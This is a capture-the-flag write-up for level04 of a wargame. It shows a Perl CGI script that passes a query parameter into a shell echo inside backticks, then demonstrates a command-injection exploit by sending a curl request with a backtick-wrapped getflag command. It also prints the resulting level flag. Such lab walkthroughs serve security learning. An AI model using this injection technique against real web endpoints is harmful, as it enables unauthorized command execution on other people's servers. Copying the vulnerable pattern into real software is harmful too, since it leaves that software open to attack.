Skip to content

Latest commit

 

History

History
28 lines (27 loc) · 1.24 KB

stages.md

File metadata and controls

28 lines (27 loc) · 1.24 KB
Raw

level04

  1. We are given Perl script level04.pl, that contains
#!/usr/bin/perl
# localhost:4747
use CGI qw{param};
print "Content-type: text/html\n\n";
sub x {
  $y = $_[0];
  print `echo $y 2>&1`;
}
x(param("x"));
  1. localhost:4747 line and description of CGI scripts in internet hints that this script is working with Get web requests on port 4747.
  2. For sending requests on port, curl command will be good
  3. Request will look like this (script receives 1 input parameter - x)
curl localhost:4747/level04.pl?x="any_text"
  1. As an output we get the same input parameter that was passed, and script using echo to print it. echo can execute commands if they passed in backticks: ` `. So let's exploit it!
  2. Pass getflag as parameter with protected backticks
curl -v localhost:4747/level04.pl?x=\`getflag\`
  1. Execution of request results to level05 flag: ne2searoevaevoem4ov4ar8ap

< PREVIOUS LEVEL | NEXT LEVEL >

MAIN MENU